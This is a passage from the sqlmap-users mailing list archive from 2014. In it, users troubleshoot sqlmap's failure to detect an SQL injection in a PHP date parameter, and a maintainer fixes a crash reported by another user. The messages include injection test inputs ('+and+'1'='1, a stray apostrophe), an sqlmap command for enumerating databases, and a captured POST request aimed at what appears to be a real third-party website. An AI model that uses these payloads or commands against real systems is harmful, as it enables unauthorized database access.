>>> to your MySQL server version for the right syntax to use near 'admin' AND
>>> a.sid=i.sid and i.ref IN (SELECT ref from
>>> Itablet)' at line 4
>>>
>>> GET fdsa.php?date1=2014-02-28&date1=2014-03-30'+and+'1'='1 will result
>>> in a PNG
>>>
>>> Since the result of a successful query is a PNG, I only expect to be
>>> able to use an error-based, or boolean/time-based attacks. However, sqlmap
>>> doesn't detect that either of the params are injectable (both are).
>>>
>>> [06:04:13] [WARNING] GET parameter 'date1' does not appear dynamic
>>> [06:04:13] [WARNING] heuristic (basic) test shows that GET parameter
>>> 'date1' might not be injectable
>>>
>>> I have tried using --text-only and am not using -o, but to no avail. Any
>>> thoughts on some tricks I can try to see if sqlmap will be able to exploit
>>> the injection points?
>>>
>>> I can send a traffic file if that helps. Currently on latest.
>>>
>>> bperry@ubuntu:~/tools/sqlmap$ git pull
>>> Already up-to-date.
>>> bperry@ubuntu:~/tools/sqlmap$
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
> ------------------------------------------------------------------------------
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
http://about.me/stamparm
|
From: Miroslav S. <mir...@gm...> - 2014-03-30 14:22:14
|
Hi.

Thank you for your report and find it fixed now [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/656

On Sun, Mar 30, 2014 at 9:26 AM, Visual Zhang <nt...@gm...> wrote:

> [15:19:32] [CRITICAL] unhandled exception in sqlmap/1.0-dev-e8c1c90,
> retry your run with the latest development version from the GitHub
> repository. If the exception persists, please send by e-mail to
> 'sql...@li...' or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the
> following text and any information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get
> back to you.
>
> sqlmap version: 1.0-dev-e8c1c90
> Python version: 2.7.6
> Operating system: posix
> Command line: sqlmap.py -r about.txt -p title --dbs --dbms Microsoft SQL Server
> Technique: TIME
> Back-end DBMS: Microsoft SQL Server (fingerprinted)
>
> Traceback (most recent call last):
>   File "sqlmap.py", line 95, in main
>     start()
>   File "/Users/ihacku/tools/sqlmap-dev/lib/controller/controller.py", line 583, in start
>     action()
>   File "/Users/ihacku/tools/sqlmap-dev/lib/controller/action.py", line 106, in action
>     conf.dumper.dbs(conf.dbmsHandler.getDbs())
>   File "/Users/ihacku/tools/sqlmap-dev/plugins/generic/databases.py", line 120, in getDbs
>     count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
>   File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line 409, in getValue
>     value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump)
>   File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line 278, in _goInferenceProxy
>     outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
>   File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line 126, in _goInferenceFields
>     output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field)
>   File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line 98, in _goInference
>     count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump)
>   File "/Users/ihacku/tools/sqlmap-dev/lib/techniques/blind/inference.py", line 528, in bisection
>     val = getChar(index, asciiTbl)
>   File "/Users/ihacku/tools/sqlmap-dev/lib/techniques/blind/inference.py", line 258, in getChar
>     forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
>   File "/Users/ihacku/tools/sqlmap-dev/lib/core/common.py", line 1501, in safeStringFormat
>     raise Exception("wrong number of parameters during string formatting")
> Exception: wrong number of parameters during string formatting
>
> and here's content of about.txt
>
> POST /about17u/siteinfo/more_wzdt.asp HTTP/1.1
> Content-Length: 75
> Content-Type: application/x-www-form-urlencoded
> X-Requested-With: XMLHttpRequest
> Referer: http://www.17u.net/
> Host: www.17u.net
> Connection: Keep-alive
> Accept-Encoding: gzip,deflate
> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
> Accept: */*
>
> search=%cb%d1%20%cb%f7&title=1
>
> ------------------------------------------------------------------------------
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
http://about.me/stamparm
|
From: Brandon P. <bpe...@gm...> - 2014-03-30 14:01:17
|
Oh, it looks like I am an idiot, this was supposed to be over SSL, but I was not passing --force-ssl.

Sorry for the spam.

On Sun, Mar 30, 2014 at 8:49 AM, Brandon Perry <bpe...@gm...> wrote:

> FWIW --parse-errors also doesn't seem to affect the output during a scan
> on the URL.
>
> On Sun, Mar 30, 2014 at 8:33 AM, Brandon Perry <bpe...@gm...> wrote:
>
>> Hi,
>>
>> I am playing around with an interesting SQL injection. A GET to a php
>> script with two params (date1 and date2) will generate a PNG when
>> successful, but will output a textual error message when, say, an
>> apostrophe is thrown in one of the dates.
>>
>> For instance, GET fdsa.php?date1=2014-02-28&date2=2014-03-30 will result
>> in a PNG.
>>
>> GET fdsa.php?date1=2014-02-28&date2=2014-03-30' (note apostrophe in last
>> param) will yield:
>>
>> You have an error in your SQL syntax; check the manual that corresponds
>> to your MySQL server version for the right syntax to use near 'admin' AND
>> a.sid=i.sid and i.ref IN (SELECT ref from
>> Itablet)' at line 4
>>
>> GET fdsa.php?date1=2014-02-28&date1=2014-03-30'+and+'1'='1 will result in
>> a PNG
>>
>> Since the result of a successful query is a PNG, I only expect to be able
>> to use an error-based, or boolean/time-based attacks. However, sqlmap
>> doesn't detect that either of the params are injectable (both are).
>>
>> [06:04:13] [WARNING] GET parameter 'date1' does not appear dynamic
>> [06:04:13] [WARNING] heuristic (basic) test shows that GET parameter
>> 'date1' might not be injectable
>>
>> I have tried using --text-only and am not using -o, but to no avail. Any
>> thoughts on some tricks I can try to see if sqlmap will be able to exploit
>> the injection points?
>>
>> I can send a traffic file if that helps. Currently on latest.
>>
>> bperry@ubuntu:~/tools/sqlmap$ git pull
>> Already up-to-date.
>> bperry@ubuntu:~/tools/sqlmap$
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
|